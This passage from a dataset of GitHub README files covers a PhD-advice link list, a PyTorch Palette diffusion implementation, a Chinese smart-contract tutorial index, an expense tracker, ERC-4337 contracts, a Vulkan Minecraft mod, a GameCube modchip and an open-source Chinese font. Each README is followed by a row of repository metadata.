[Notes on writing by Fredo Durand](http://people.csail.mit.edu/fredo/PUBLI/writing.pdf)
[How to write a (hopefully good) paper by Martin Vetterli ](http://mri.beckman.illinois.edu/resources/good_paper.pdf)
### Blogposts
[PhDLife Blog](https://phdlife.warwick.ac.uk/) - A collection of blog posts from [Warwick University](https://warwick.ac.uk)
### Reviewing
[Reviewer Tutorial by CVPR 2022](https://cvpr2022.thecvf.com/sites/default/files/2021-11/How%20to%20be%20a%20good%20reviewer-tutorials%20for%20cvpr2022%20reviewers.pptx.pdf)
[How to write a good review by CVPR 2020](https://sites.google.com/view/making-reviews-great-again/)
[How to write a reviewer report by Stanley Chan](https://engineering.purdue.edu/ChanGroup/write_review.html)
### Presenting
[Giving an Academic Talk by Jonathan Shewchuk](https://people.eecs.berkeley.edu/~jrs/speaking.html)
[How to give a technical presentation by Michael Ernst](https://homes.cs.washington.edu/~mernst/advice/giving-talk.html)
### Advising students
(coming soon, send PR!)
### Teaching
[How to Be a Teaching Assistant by Jason Eisner](https://www.cs.jhu.edu/~jason/advice/how-to-ta.html)
### Fellowship applications
[Tips for the NSF GRFP Application by Danielle Perry](https://web.uri.edu/graduate-writing-center/tips-for-the-nsf-grfp-application/)
[NSF GRFP Advice by Christine Liu](http://www.christineliuart.com/writing/2018/8/31/advice-for-applying-to-the-nsf-grfp)
[NSF Fellowship by Alex Lang](https://www.alexhunterlang.com/nsf-fellowship)
[Tips by Tara Safavi](https://tsafavi.github.io/nsf-grfp.html)
Public examples: [[Extensive NSF collection by Alex Lang]](https://docs.google.com/spreadsheets/d/1xoezGhbtcpg3BvNdag2F5dTQM-Xl2EELUgAfG1eUg0s/edit#gid=0), [[Victoria Dean (NSF personal)]](https://vdean.github.io/resources/NSF_Personal_Statement_Victoria_Dean.pdf), [[Victoria Dean (NSF research)]](https://vdean.github.io/resources/NSF_Research_Statement_Victoria_Dean.pdf), [[Tara Safavi (NSF)]](https://tsafavi.github.io/assets/pdf/nsf-personal.pdf), [[Paul Liang (Facebook)]](http://www.cs.cmu.edu/~pliang/research_statement_paul_liang_2020.pdf), [[Devendra Chaplot (Facebook)]](https://devendrachaplot.github.io/misc/DevendraChaplot_Statement2019.pdf), [[Sai Rallabandi (Facebook)]](http://www.cs.cmu.edu/~srallaba/pdfs/fellowships_mothersheet.pdf)
### Networking
[Networking on the Network: A Guide to Professional Skills for PhD Students by Phil Agre](https://vlsicad.ucsd.edu/Research/Advice/network.html)
### Organizing workshops and tutorials
[Hitchhiker’s guide to organizing an academic workshop by Ben Eysenbach and Surya Bhupatiraju](https://medium.com/@erl.leads/hitchhikers-guide-to-organizing-an-academic-workshop-cc9a5b1c32c9)
### Attending academic conferences
[Nine things I wish I had known the first time I came to NeurIPS by Jennifer Vaughan](https://medium.com/@jennwv/nine-things-i-wish-i-had-known-the-first-time-i-came-to-nips-b939330661ed)
[NeurIPS 2018 through the eyes of first-timers by Fangyu Cai](https://medium.com/syncedreview/neurips-2018-through-the-eyes-of-first-timers-5156384900bd)
[How To Make A Plan To Attend International Academic Conferences](https://internationalconferencealerts.com/blog/how-to-make-a-plan-to-attend-international-academic-conferences/)
### Job search
[Tips for Computer Science Faculty Applications](https://yisongyue.medium.com/checklist-of-tips-for-computer-science-faculty-applications-9fd2480649cc)
[How to Ask for a Letter of Recommendation](https://kamathematics.wordpress.com/2021/08/18/how-to-ask-for-a-letter-of-recommendation/)
[Interview Questions for Computer Science Faculty Jobs](https://csfaculty.github.io/)
[The Ph.D. Job Hunt - Helping Students Find the Right Positions by Ed Lazowska](http://lazowska.cs.washington.edu/jobs.pdf)
[The N Things I wish I Knew Before the Job Search, by Maria Ebling, Guerney Hunt, Lily Mummert, Bill Tetzlaff, and John Davis](https://people.engr.tamu.edu/rabi/N%20Things.PDF)
[The academic job search for computer scientists in 10 questions by Nicolas Papernot and Elissa Redmiles](https://docs.google.com/document/u/1/d/e/2PACX-1vSeOnC_QdaJVc3OuuMfDHVlk3QotUxvghytRFaDsrdA0uovD5axQjp8kJCM4Evu1cCf9Hg_u_Stabu1/pub)
[Checklist for faculty job-hunting in Stat/ML by Aaditya Ramdas](https://www.stat.cmu.edu/~aramdas/checklists/aadi-jobhunt-checklist.pdf)
[Tips on the interview process by Jeannette Wing](https://www.cs.cmu.edu/~emigration/interview.pdf)
[Getting an academic job by Michael Ernst](https://homes.cs.washington.edu/~mernst/advice/academic-job.html)
[Computer science graduate job and interview guide by Wes Weimer, Claire Le Goues, Zak Fry, Kevin Leach, Yu Huang, and Kevin Angstadt](https://csguides.github.io/grad-job-guide/)
[Academic job search advice by Matt Might](http://matt.might.net/articles/advice-for-academic-job-hunt/)
## Memoirs
[I loved graduate school by Peter Bailis](http://www.bailis.org/blog/i-loved-graduate-school/)
[What my PhD was like by Jean Yang](https://jxyzabc.blogspot.com/2016/02/my-phd-abridged.html)
[How to get a Ph.D. in computer science if you're me by Chris Martens](http://lambdamaphone.blogspot.com/2015/11/how-to-get-phd-in-computer-science-if.html)
[The N=1 guide to grad school by Adam Marcus](http://marcua.net/writing/gradschool-guide/)
| Collection of advice for prospective and current PhD students | phd-students,phd-application,research,computer-science,machine-learning | 0 | 4 | 6 | 40 | 0 | 1 | 0 |
Janspiry/Palette-Image-to-Image-Diffusion-Models | # Palette: Image-to-Image Diffusion Models
[Paper](https://arxiv.org/pdf/2111.05826.pdf ) | [Project](https://iterative-refinement.github.io/palette/ )
## Brief
This is an unofficial implementation of **Palette: Image-to-Image Diffusion Models** by **Pytorch**, and it is mainly inherited from its super-resolution version [Image-Super-Resolution-via-Iterative-Refinement](https://github.com/Janspiry/Image-Super-Resolution-via-Iterative-Refinement). The code template is from my another seed project: [distributed-pytorch-template](https://github.com/Janspiry/distributed-pytorch-template).
There are some implementation details with paper descriptions:
- We adapted the U-Net architecture used in `Guided-Diffusion`, which give a substantial boost to sample quality.
- We used the attention mechanism in low-resolution features (16×16) like vanilla `DDPM`.
- We encode the $\gamma$ rather than $t$ in `Palette` and embed it with affine transformation.
- We fix the variance $Σ_\theta(x_t, t)$ to a constant during the inference as described in `Palette`.
## Status
### Code
- [x] Diffusion Model Pipeline
- [x] Train/Test Process
- [x] Save/Load Training State
- [x] Logger/Tensorboard
- [x] Multiple GPU Training (DDP)
- [x] EMA
- [x] Metrics (now for FID, IS)
- [x] Dataset (now for inpainting, uncropping, colorization)
- [x] Google colab script 🌟(now for inpainting)
### Task
I try to finish following tasks in order:
- [x] Inpainting on [CelebaHQ](https://drive.google.com/drive/folders/1CjZAajyf-jIknskoTQ4CGvVkAigkhNWA?usp=sharing)🚀 ([Google Colab](https://colab.research.google.com/drive/1wfcd6QKkN2AqZDGFKZLyGKAoI5xcXUgO#scrollTo=8VFpuekybeQK))
- [x] Inpainting on [Places2 with 128×128 centering mask](https://drive.google.com/drive/folders/1fLyFtrStfEtyrqwI0N_Xb_3idsf0gz0M?usp=sharing)🚀
The follow-up experiment is uncertain, due to lack of time and GPU resources:
- [ ] Uncropping on Places2
- [ ] Colorization on ImageNet val set
## Results
The DDPM model requires significant computational resources, and we have only built a few example models to validate the ideas in this paper.
### Visuals
#### Celeba-HQ
Results with 200 epochs and 930K iterations, and the first 100 samples in [centering mask](https://drive.google.com/drive/folders/10zyHZtYV5vCht2MGNCF8WzpZJT2ae2RS?usp=sharing) and [irregular mask](https://drive.google.com/drive/folders/1vmSI-R9J2yQZY1cVkSSZlTYil2DprzvY?usp=sharing).
| ![Process_02323](misc//image//Process_02323.jpg) | ![Process_02323](misc//image//Process_26190.jpg) |
| ------------------------------------------------ | ---- |
#### Places2 with 128×128 centering mask
Results with 16 epochs and 660K iterations, and the several **picked** samples in [centering mask](https://drive.google.com/drive/folders/1XusKO0_M6GUfPG-FOlID0Xcp0SiexKNe?usp=sharing).
| ![Mask_Places365_test_00209019.jpg](misc//image//Mask_Places365_test_00209019.jpg) | ![Mask_Places365_test_00143399.jpg](misc//image//Mask_Places365_test_00143399.jpg) | ![Mask_Places365_test_00263905.jpg](misc//image//Mask_Places365_test_00263905.jpg) | ![Mask_Places365_test_00144085.jpg](misc//image//Mask_Places365_test_00144085.jpg) |
| ------------------------------------------------------------ | ------------------------------------------------------------ | ------------------------------------------------------------ | ---- |
| ![Out_Places365_test_00209019](misc//image//Out_Places365_test_00209019.jpg) | ![Out_Places365_test_00143399.jpg](misc//image//Out_Places365_test_00143399.jpg) | ![Out_Places365_test_00263905.jpg](misc//image//Out_Places365_test_00263905.jpg) | ![Out_Places365_test_00144085.jpg](misc//image//Out_Places365_test_00144085.jpg) |
#### Uncropping on Places2
Results with 8 epochs and 330K iterations, and the several **picked** samples in [uncropping](https://drive.google.com/drive/folders/1tC3B8ayaadhXAJrOCTrw15R8t84REPWJ?usp=sharing).
| ![Process_Places365_test_00309553](misc//image//Process_Places365_test_00309553.jpg) | ![Process_Places365_test_00042384](misc//image//Process_Places365_test_00042384.jpg) |
| ------------------------------------------------ | ---- |
### Metrics
| Tasks | Dataset | EMA | FID(-) | IS(+) |
| -------------------- | ----------- | -------- | ---- | -------------------- |
| Inpainting with centering mask | Celeba-HQ | False | 5.7873 | 3.0705 |
| Inpainting with irregular mask | Celeba-HQ | False | 5.4026 | 3.1221 |
## Usage
### Environment
```python
pip install -r requirements.txt
```
### Pre-trained Model
| Dataset | Task | Iterations | GPUs×Days×Bs | URL |
| --------- | ---------- | ---------- | ------------ | ------------------------------------------------------------ |
| Celeba-HQ | Inpainting | 930K | 2×5×3 | [Google Drive](https://drive.google.com/drive/folders/13YZ2UAmGJ-b7DICr-FDAPM7gctreJEoH?usp=sharing) |
| Places2 | Inpainting | 660K | 4×8×10 | [Google Drive](https://drive.google.com/drive/folders/1Vz_HC0LcpV6yMLOd-SXyoaqJHtxyPBxZ?usp=sharing) |
**Bs** indicates sample size per gpu.
### Data Prepare
We get most of them from Kaggle, which may be slightly different from official version, and you also can download them from official website.
- [CelebA-HQ resized (256x256) Kaggle](https://www.kaggle.com/datasets/badasstechie/celebahq-resized-256x256)
- [Places2 Official](http://places2.csail.mit.edu/download.html) | [Places2 Kaggle](https://www.kaggle.com/datasets/nickj26/places2-mit-dataset?resource=download)
- [ImageNet Official](https://www.image-net.org/download.php)
We use the default division of these datasets for training and evaluation. The file lists we use can be found in [Celeba-HQ](https://drive.google.com/drive/folders/1-ym2Mi2jVKdWmWYKJ_L2TWXjUQh8z7H-?usp=sharing), [Places2](https://drive.google.com/drive/folders/11Qj2MtRfiD7LbKEveYwOLaiX62lm_2ww?usp=sharing).
After you prepared own data, you need to modify the corresponding configure file to point to your data. Take the following as an example:
```yaml
"which_dataset": { // import designated dataset using arguments
"name": ["data.dataset", "InpaintDataset"], // import Dataset() class
"args":{ // arguments to initialize dataset
"data_root": "your data path",
"data_len": -1,
"mask_mode": "hybrid"
}
},
```
More choices about **dataloader** and **validation split** also can be found in `datasets` part of configure file.
### Training/Resume Training
1. Download the checkpoints from given links.
1. Set `resume_state` of configure file to the directory of previous checkpoint. Take the following as an example, this directory contains training states and saved model:
```yaml
"path": { //set every part file path
"resume_state": "experiments/inpainting_celebahq_220426_150122/checkpoint/100"
},
```
2. Set your network label in `load_everything` function of `model.py`, default is **Network**. Follow the tutorial settings, the optimizers and models will be loaded from 100.state and 100_Network.pth respectively.
```python
netG_label = self.netG.__class__.__name__
self.load_network(network=self.netG, network_label=netG_label, strict=False)
```
3. Run the script:
```python
python run.py -p train -c config/inpainting_celebahq.json
```
We test the U-Net backbone used in `SR3` and `Guided Diffusion`, and `Guided Diffusion` one have a more robust performance in our current experiments. More choices about **backbone**, **loss** and **metric** can be found in `which_networks` part of configure file.
### Test
1. Modify the configure file to point to your data following the steps in **Data Prepare** part.
2. Set your model path following the steps in **Resume Training** part.
3. Run the script:
```python
python run.py -p test -c config/inpainting_celebahq.json
```
### Evaluation
1. Create two folders saving ground truth images and sample images, and their file names need to correspond to each other.
2. Run the script:
```python
python eval.py -s [ground image path] -d [sample image path]
```
## Acknowledge
Our work is based on the following theoretical works:
- [Denoising Diffusion Probabilistic Models](https://arxiv.org/pdf/2006.11239.pdf)
- [Palette: Image-to-Image Diffusion Models](https://arxiv.org/pdf/2111.05826.pdf)
- [Diffusion Models Beat GANs on Image Synthesis](https://arxiv.org/abs/2105.05233)
and we are benefiting a lot from the following projects:
- [openai/guided-diffusion](https://github.com/openai/guided-diffusion)
- [LouisRouss/Diffusion-Based-Model-for-Colorization](https://github.com/LouisRouss/Diffusion-Based-Model-for-Colorization)
| Unofficial implementation of Palette: Image-to-Image Diffusion Models by Pytorch | ddpm,image-restoration,ddp,implementation,pytorch,diffusion-model | 0 | 2 | 3 | 39 | 24 | 1 | 0 |
33357/smartcontract-apps | # smartcontract-apps
学习不是目的,工作不是终点。
## 前言
大家好,我是 33357,目前是一名智能合约工程师。
我从事这门行业,不是为了什么理想,只是为了改变自己的生活。而从某种意义上说,我的确实现了。如果没有从事智能合约,我可能还在 996、考研、为了大厂面试刷题。我应该没有机会在这里,平静地和大家说着这些话。
还记得 21 年 5 月的时候,学校里考研的,找工作的,留级的,都已经定好了。只有我还什么都没有,急得快哭了。上年秋招的时候虽然面试了好几个互联网大厂,但没一个过的。那时候的我孤注一掷,研究 DAPP,凭此投了好几家区块链公司,居然成功了。
第一份工作其实还算顺利,老板人也不坏,但我并不能安心。外地工作必然要买房,房贷那就是身上的一座山,让我几乎看不到未来的模样。思考再三,我在年底辞职了,因为我知道留不住。
接下来是自己干活。我接过项目,也做项目,但接项目没渠道,自己做的没人气。倒是研究机器人赚了点钱,可以勉强维持生活。自己维持现金流其实蛮难的,如履薄冰,最后机器人也做不下去了,只能接着找工作。
22 年中的行业市场很坏,我投了几十家公司,只有五六个面试,最后一个也没去成。最后我找到了一家初创团队,可以远程工作,才结束了这段时期。老实说,从这个时段开始,我才真正摸到了一些行业的门道。
XEN 对我来说是一个神奇的项目。2 月的时候,我发现了 RND,而 XEN 几乎和 RND 有异曲同工之妙。我之前在智能合约上摸索出来的经验在 XEN 上发挥了巨大的功效,赚到了一笔钱,足够我支持自己安稳度过整个行业的熊市了。
接下来,我要开始一段新的人生进度。回想起来,如果和一年半之前有什么不同的话,那就是我不再会去为了生计而工作了,打工人毕竟是没有前途的。区块链的周期依然存在,如果我能从现在开始为行业做出点事情,那么在未来的牛市上,应该会有更大的回报。
祝大家有所收获。
## 通知推送
twitter:[33357xyz](https://twitter.com/33357xyz)
## 加入社群
tg: [smartcontractapps](https://t.me/smartcontractapps)
wx:_33357xyz(备注sc-apps)
<!-- discord: [智能合约应用](https://discord.gg/YjsvmyG84H) -->
## 特别篇
这是一些具有指导性的文章,可以为你指明前进的方向。
<!-- - [Web3 自由之道](./Special/Web3FreeDao.md) -->
- [如何入门智能合约开发](./Special/New.md)
- [如何在区块链领域用技术赚钱](./Special/Earn.md)
- [如何成为资深智能合约工程师](./Special/Dev.md)
- [如何成为躺着赚钱的科学家](./Special/Scientist.md)
- [选择什么语言编写智能合约](./Special/Language.md)
## GAS 排名合约分析
[GasTracker](https://etherscan.io/gastracker) 排名靠前的合约具有较高的研究价值
- [通过 GAS 排行搜寻新机会](./Gas/GasSearch.md)
- [Uniswap Universal Router 之 Permit2 合约分析](./Gas/UniswapUniversalRouter_Permit2.md)
## EIPS
- [反闪电贷协议 EIP7690](./EIPS/eip7690.md)
- [EIP7511 最小代理合约解析](./EIPS/eip7511.md)
- [比最小代理更小的代理合约](./EIPS/smallerProxy.md)
- [坎昆升级简析](./EIPS/dencun.md)
## 会议篇
- [黑客松对开发者有什么用](./Meeting/Hackathon.md)
- [2023年香港 web3 嘉年华](./Meeting/Web3HongKong.md)
## 智能合约事件分析
有了区块链技术的基础,在智能合约上编程,真正做到了“code is law,code is money”。这里会收集一些实时的智能合约事件及其技术和模式的分析。
<!-- - [XEN,又一次的 GAS 换真金](./Event/Xen.md) -->
- [让 EVM 再次伟大,用智能合约保证 MEME 的安全](./Event/meme.md)
- [当去中心化遇到攻击: BSC停机事件](./Event/WhenAttackDecentralization.md)
- [又是用户转移资产权限被盗,如何确保加密资产安全?](./Event/ContractApproveHack.md)
- [RandomDAO事件](./Event/RandomDAO.md)
- [EIP1559下的GAS费设置](./Event/EIP1559_GAS.md)
- [X2Y2: 必须修改的中心化NFT挂单奖励机制](./Event/X2Y2_DecentralizedOrderReward.md)
- [链上通信协议](./Event/OnChainMessageProtocol.md)
- [CheapSwap协议的诞生](./Event/CheapSwap.md)
- [以太坊POS合并带来的赚钱机会](./Event/PosMerge.md)
- [ETHW重放攻击](./Event/Replay.md)
<!-- - [0转账攻击](./Event/0TransferAttack.md) -->
## 智能合约应用
- DEX
去中心化交易所,又称DEX,是指基于区块链上智能合约实现的代币交易类应用。用户可以在区块链上完成“代币定价-支付代币-获得代币”的完整业务流程,实现无需托管的代币交易。但同时用户也会受到交易深度不够、合约被黑客攻击和链上手续费高昂等问题的困扰。
- [Uniswap_v2](./Apps/DEX/Uniswap_v2/)
- [Uniswap_v4](./Apps/DEX/Uniswap_v4/)
- Loan
去中心化借贷,是DEFI的一种重要形式,是一种基于区块链上智能合约实现的代币借贷类应用。用户可以在区块链上完成“代币存借-收益计算-获得/支付利息”的完整业务流程,实现无需认证的自动化超抵押借贷。
- [Compound](./Apps/Loan/Compound/)
## Solidity 使用技巧
SOLIDITY 是目前使用最广泛的 EVM 智能合约语言,通过学习它可以了解智能合约的运行机制,并设计出更加符合业务的 DAPP。
- 100 个 Solidity 使用技巧
提示:阅读本教程需要一定的 solidity 基础知识。为了帮助智能合约开发者更好地使用 Solidity,我会在讲解代码的同时给出测试用例,帮助开发者在实践中更好地理解 Solidity 的特性。在这里,我会使用 [https://remix.ethereum.org/](https://remix.ethereum.org/) 作为 Solidity 的开发工具给大家演示,Soldity 版本为 0.8.12。
- [1. 合约重入攻击](./Solidity/Solidity_100/1_Reentrancy_Attack/)
- [2. 交易回滚攻击](./Solidity/Solidity_100/2_Transaction_Rollback_Attack/)
- 其他技巧
- [不受单个矿工控制的链上随机数生成方法](./Solidity/Other/random.md)
- [最省GAS链上排序](./Solidity/Other/Save_Gas_Sort.md)
- [NFT 所有者 tokenID 快速查询](./Solidity/Other/NFT_Search.md)
- [Solidity 智能合约开发流程](./Solidity/Other/Solidity_Development_Process.md)
- [如何预测最低的 GasPrice](./Solidity/Other/Lowest_GasPrice.md)
## 一点思考
如何使用技术改善自己的人生,这是每个从业者要解决的首要问题。
- [2022年中展望](./Outlook/2022_MidYear.md)
<!-- - [33357的目标](./Outlook/Target.md) -->
<!-- - [人生的边际效应](./Outlook/Marginal_Utility.md) -->
<!-- - [2022年末总结](./Outlook/2022_End.md) -->
## 生态研究
- [以太坊扩容:L2 详解](./Search/L2.md)
- [BRC20 解析](./Search/brc20.md)
- [ethscriptions 铭文链和哑合约](./Search/ethscriptions.md)
## 套利机器人
在区块链上实现盈利的机器人有不少种类,如果策略得当的话可以实现躺赚目标。这里会记录一些机器人的类型和实现。
- [搬砖交易机器人](./Robot/Moving_Exchange_Robot/)
- [三明治交易机器人](./Robot/Sandwich_Exchange_Robot/)
- [抢跑机器人](./Robot/Running_Robot/)
- [MEV 是在为谁工作](./Robot/MEV_Who_are_you_working_for.md)
- [一个通用的套利交易模型](./Robot/TradeModel.md)
## 维护员
[@33357](https://github.com/33357) | 这是一个面向中文社区,分析市面上智能合约应用的架构与实现的仓库。 | null | 0 | 2 | 35 | 166 | 0 | 1 | 0 |
h4h13/Paisa | <p align="center">
<a href="https://retromusic.app">
<img src="assets\images\icon.png" height="128">
<h1 align="center">Paisa - Expense Tracker</h1>
</a>
</p>
<p align="center">
<a href="https://flutter.dev/" style="text-decoration:none" area-label="flutter">
<img src="https://img.shields.io/badge/Platform-Flutter%203.22.2-blue">
</a>
<a href="https://github.com/RetroMusicPlayer/Paisa/releases/tag/v6.1.4" style="text-decoration:none" area-label="flutter">
<img src="https://img.shields.io/badge/Version-6.1.4-orange">
</a>
<a href="https://play.google.com/store/apps/details?id=dev.hemanths.paisa" style="text-decoration:none" area-label="play store">
<img src="https://img.shields.io/badge/Download-Google%20Play-green">
</a>
<a href="https://apps.microsoft.com/store/detail/9NQ2KR46N764?launch=true&mode=mini" style="text-decoration:none" area-label="windows">
<img src="https://img.shields.io/badge/Download-Micrsoft%20Store-red">
</a>
</p>
<p align="center">
<h2> Material design expense manager</h2>
</p>
### ⚠ Join [Telegram Group](https://t.me/app_paisa) for important updates
### Screen shots
#### Mobile
| <img src="paisa-images/flutter_01.png" width="200"/> | <img src="paisa-images/flutter_02.png" width="200"/> | <img src="paisa-images/flutter_04.png" width="200"/> | <img src="paisa-images/flutter_03.png" width="200"/> |
| :--------------------------------------------------: | :--------------------------------------------------: | :--------------------------------------------------: | :--------------------------------------------------: |
| Home | Accounts | Categories | Budget overview |
#### Foldable
| <img src="paisa-images/Screenshot_1667485291.png" width="200"/> | <img src="paisa-images/Screenshot_1667485297.png" width="200"/> | <img src="paisa-images/Screenshot_1667485299.png" width="200"/> | <img src="paisa-images/Screenshot_1667485301.png" width="200"/> |
| :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: |
| Home | Accounts | Categories | Budget overview |
#### Tablet & Desktop
| <img src="paisa-images/Screenshot_1667485280.png" width="200"/> | <img src="paisa-images/Screenshot_1667485342.png" width="200"/> | <img src="paisa-images/Screenshot_1667485319.png" width="200"/> | <img src="paisa-images/Screenshot_1667485320.png" width="200"/> |
| :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: |
| Home | Accounts | Categories | Budget overview |
### Expense Tracking
- Tracking expenses, incomes & deposits
- Account & budget visw overview
- Manage categories
### Steps to translate
1. Create `.arb` file inside `lib/localization/app_<language_code>.arb` example `app_en.arb`
2. Copy all transactions from `app_en.arb` to created file and remove all keys which annotates with `@`
From
```json
{
"appTitle": "Paisa",
"@appTitle": {
"description": "The app name",
"type": "text",
"placeholders": {}
}
}
```
To
```json
{
"appTitle": "Paisa"
}
```
3. Check `untranslated.json` for anything missing keys need to be translated
4. Run the app and check once
### Steps to build project
1. Clone the Flutter Project:
- Use `git clone https://github.com/RetroMusicPlayer/Paisa.git` to download the project from the GitHub repository.
2. Install Dependencies:
- Navigate to the project directory and run `flutter pub get` to install the required dependencies.
3. Run the App:
- Connect a device or emulator and run the app using `flutter run --flavor dev` or through your IDE.
### Download
[<img alt='Get it on Google Play' width=256 height=100 src='https://play.google.com/intl/en_us/badges/static/images/badges/en_badge_web_generic.png'/>](https://play.google.com/store/apps/details?id=dev.hemanths.paisa&hl=en_US&pli=1&pcampaignid=pcampaignidMKT-Other-global-all-co-prtnr-py-PartBadge-Mar2515-1)
[<img width=180 height=100 src="https://get.microsoft.com/images/en-us%20dark.svg" alt="Download Microsoft Store" />](https://apps.microsoft.com/store/detail/9NQ2KR46N764?launch=true&mode=mini)
### License
Copyright (c) 2022, Hemanth Savarala
All rights reserved.
This source code is licensed under the GPLv3-style license found in the
LICENSE file in the root directory of this source tree.
| Expense manager for Android with Material Design | android,blocstatemanagement,clean-architecture,windows,bloc,dart,flutter,injectable,material-design,material-ui | 63 | 34 | 129 | 735 | 46 | 18 | 1 |
eth-infinitism/account-abstraction | Implementation of contracts for [ERC-4337](https://eips.ethereum.org/EIPS/eip-4337) account abstraction via alternative mempool.
# Resources
[Vitalik's post on account abstraction without Ethereum protocol changes](https://medium.com/infinitism/erc-4337-account-abstraction-without-ethereum-protocol-changes-d75c9d94dc4a)
[Discord server](http://discord.gg/fbDyENb6Y9)
[Bundler reference implementation](https://github.com/eth-infinitism/bundler)
[Bundler specification test suite](https://github.com/eth-infinitism/bundler-spec-tests)
| null | null | 4 | 32 | 345 | 384 | 7 | 24 | 1 |
xCollateral/VulkanMod | # <a href="https://github.com/xCollateral/VulkanMod"> <img src="./src/main/resources/assets/vulkanmod/Vlogo.png" width="30" height="30"/> </a> VulkanMod
This is a fabric mod that introduces a brand new **Vulkan** based voxel rendering engine to **Minecraft java** in order to both replace the default OpenGL renderer and bring performance improvements.
### Why?
- Highly experimental project that overhauls and modernizes the internal renderer for Minecraft. <br>
- Updates the renderer from OpenGL 3.2 to Vulkan 1.2. <br>
- Provides a potential reference for a future-proof Vulkan codebase for Minecraft Java. <br>
- Utilizes the VulkanAPI to allow for capabilities not always possible with OpenGL. <br>
- Including reduced CPU Overhead and use of newer, modern hardware capabilities. <br>
### Demonstration Video:
[![Demostration Video](http://img.youtube.com/vi/sbr7UxcAmOE/0.jpg)](https://youtu.be/sbr7UxcAmOE)
## FAQ
- Remember to check the [Wiki](https://github.com/xCollateral/VulkanMod/wiki) we wrote before asking for support!
## Installation
### Download Links:
- [![CurseForge](https://cf.way2muchnoise.eu/full_635429_downloads.svg?badge_style=flat)](https://www.curseforge.com/minecraft/mc-mods/vulkanmod)
- [![Modrinth Downloads](https://img.shields.io/modrinth/dt/JYQhtZtO?logo=modrinth&label=Modrinth%20Downloads)](https://modrinth.com/mod/vulkanmod/versions)
- [![GitHub Downloads (all assets, all releases)](https://img.shields.io/github/downloads/xCollateral/VulkanMod/total?style=flat-square&logo=github&label=Github%20Downloads)](https://github.com/xCollateral/VulkanMod/releases)
### Install guide:
>1) Install the [fabric modloader](https://fabricmc.net).
>1) Download and put the `Vulkanmod.jar` file into `.minecraft/mods`
>1) Enjoy !
## Useful links
<table>
<tr>
<th> Discord server</th>
<th> Ko-Fi</th>
</tr>
<tr>
<td style="text-align:center">
<a href="https://discord.gg/FVXg7AYR2Q">
<img alt="Discord" align="top" src="https://img.shields.io/discord/963180553547419670?style=flat-square&logo=discord&logoColor=%23FFFFFF&label=Vulkanmod%20official%20discord%20server&labelColor=%235865F2&color=%235865F2">
</a>
</td>
<td>
<a href="https://ko-fi.com/V7V7CHHJV">
<img alt="Static Badge" align="top" src="https://img.shields.io/badge/KoFi-%23ff5e5b?logo=ko-fi&logoColor=%23FFFFFF&link=https%3A%2F%2Fko-fi.com%2FV7V7CHHJV">
</a>
</td>
</tr>
</table>
## Features
### Optimizations:
>- [x] Multiple chunk culling algorithms
>- [x] Reduced CPU overhead
>- [x] Improved GPU performance
>- [x] Indirect Draw mode (reduces CPU overhead)
>- [x] Chunk rendering optimizations
### New changes:
>- [x] Native Wayland support
>- [x] GPU selector
>- [x] Windowed fullscreen mode
>- [x] Revamped graphic settings menu
>- [x] Resizable render frame queue
>- [ ] Shader support
>- [ ] Removed Herobrine
## Notes
- This mod is still in development, please report issues in the [issue tab](https://github.com/xCollateral/VulkanMod/issues) with logs attached!
- This mode isn't just "minecraft on vulkan" (e.g: [zink](https://docs.mesa3d.org/drivers/zink.html) ), it is a full rewrite of the minecraft renderer.
| Vulkan renderer mod for Minecraft. | minecraft,vulkan,minecraft-mod,vulkan-renderer | 41 | 5 | 98 | 197 | 130 | 5 | 1 |
webhdx/PicoBoot | <img src="/assets/PicoBoot.png" alt="PicoBoot" align="left"/>
# PicoBoot
This is a long awaited IPL replacement modchip for Nintendo GameCube. It's open source, cheap and easy to install.
Join Discord Server to get support and discuss new features:
[![](https://dcbadge.vercel.app/api/server/fEhyWRPCmb)](https://click.webhdx.dev/discord)
## Features
* it's open source
* uses $4 Raspberry Pi Pico board
* very easy installation, only 5 wires to solder
* programmable via USB cable, without any drivers and programs
* automatically boots any DOL app of your choice
* uses "IPL injection" approach superior to mods like XenoGC
## Video guides and features overview
- [PicoBoot Modchip Will Unleash The POWER of Your Nintendo GAMECUBE! | Installation Guide and Overview](https://www.youtube.com/watch?v=qwL4ZSa0xMo) by [MachoNachoProductions](https://www.youtube.com/c/MachoNachoProductions)
- [This new Gamecube Modchip is a GAMECHANGER - PicoBoot](https://www.youtube.com/watch?v=lfMTLEM0yeQ) by [RockerGaming](https://www.youtube.com/c/RockerGaming)
- [$5 Gamecube IPL Modchip?! Picoboot Dol-001 + Dol-101 Installation / Setup / Showcase](https://www.youtube.com/watch?v=W_9-mSBMBJ4) by [ModzvilleUSA!](https://www.youtube.com/c/ModzvilleUSA)
- [PicoBoot GameCube custom mod chip - make and install your own chip with a Raspberry Pi Pico](https://youtu.be/rDrosSd-nDc) by [Joe Bleeps](https://www.youtube.com/@JoeBleeps)
## Installation guide
Head over to [support.webhdx.dev](https://support.webhdx.dev/gc/picoboot) for [Installation guide](https://support.webhdx.dev/gc/picoboot/installation-guide) and [Troubleshooting tips](https://support.webhdx.dev/gc/picoboot/troubleshooting).
## I appreciate your work. Can I support you in any way?
This project is free and available for everyone. If you want to support it anyway, consider using [:heart: Sponsor](https://github.com/sponsors/webhdx) button.
## Hall of Fame
I'd like to thank people who helped making PicoBoot possible:
* #gc-forever crew: [Extrems](https://github.com/Extrems), [novenary](https://github.com/9ary), [emu_kidid](https://github.com/emukidid) and others
* [tmbinc](https://github.com/tmbinc) - he started it all 🙏
* happy_bunny - I started my research with his great writeup on [Shuriken Attack](https://www.retro-system.com/shuriken_attack.htm)
* beta testers: [seewood](https://github.com/seewood), [MethodOrMadness](https://github.com/MethodOrMadness), [renanbianchi](https://github.com/renanbianchi)
* content creators: [MachoNachoProductions](https://www.youtube.com/c/MachoNachoProductions), [RockerGaming](https://www.youtube.com/c/RockerGaming), [ModzvilleUSA!](https://www.youtube.com/c/ModzvilleUSA)
* people who sponsored this project
* every PicoBoot enjoyer - it's all about you after all 😉
## Acknowledgements
Some parts of this project use GPL-2.0 licensed code from:
* https://github.com/redolution/iplboot
| Raspberry Pi Pico (RP2040) based IPL replacement modchip for GameCube | gamecube,modchip | 4 | 3 | 9 | 60 | 23 | 2 | 0 |
ButTaiwan/iansui | ![芫荽/iansui](img/iansui_cover.jpg)
# 芫荽 / iansui
An open source Chinese font derived from Klee One (Fontworks).
